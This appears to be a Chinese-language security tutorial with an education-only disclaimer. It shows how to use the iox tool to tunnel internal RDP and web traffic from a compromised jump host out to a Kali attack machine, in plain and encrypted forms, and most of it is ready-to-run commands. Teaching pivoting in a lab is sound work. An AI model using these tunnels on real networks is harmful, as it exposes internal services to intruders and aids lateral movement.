0.实际操作视频,请移步
https://www.bilibili.com/video/BV1Nd4y127oA/
声明:
本课程仅限于网络安全教学和网络安全技术交流,严禁用于非法途径,请遵守网络安全法
1.IOX简介
用Go编写,功能类似于lcx/ew,优化了网络逻辑,简化了使用方法
1.1工作模式 fwd 和proxy
2.1IOX下载
wget https://github.com/EddieIvan01/iox/releases/download/v0.4/iox_v0.4-next_Linux_x86_64.tar.gz
2.2中文说明文档
https://github.com/EddieIvan01/iox/blob/master/docs/README_CN.md
3.端口转发和加密的端口转发
3.1端口转发fwd模式,将内网rdp流量转发到外网攻击机上
攻击机kali执行iox转发,将3389和4489两个链接流量转发
/iox fwd -l 3389 -l 4489 -k 123456 &
跳板机centos执行iox转发,将远程10.10.10.13:3389端口流量转发到192.168.1.5:3389上
./iox -r 10.10.10.13:3389 -r 192.168.1.5:3389 -k 123456 &
3.2kali访问内网10.10.10.13的rdp
rdesktop 192.168.1.5:4489
3.2流量加密端口转发fwd模式,将内网rdp流量加密转发到外网攻击机上
攻击机kali执行iox转发,将3389(加密)和4489两个链接流量转发
./iox fwd -l *3389 -l 4489 -k 123456 &
跳板机centos执行iox转发,将远程10.10.10.13:3389端口流量转发到192.168.1.5:3389(加密)上
./iox fwd -r 10.10.10.13:3389 -r *192.168.1.5:3389 -k 123456
3.3kali访问内网10.10.10.13的rdp
rdesktop 192.168.1.5:4489
3.4流量加密端口转发fwd模式,将内网web流量加密转发到外网攻击机上
攻击机kali执行iox转发,将8080(加密)和4489两个链接流量转发
./iox fwd -l *8080 -l 8888 -k 123456 &
跳板机centos执行iox转发,将远程10.10.10.13:8080端口流量转发到192.168.1.5:8080(加密)上
./iox fwd -r 10.10.10.13:8080 -r *192.168.1.5:8080 -k 123456 &
3.5kali攻击机访问内网web业务,浏览器直接访问http://192.168.1.5:8888
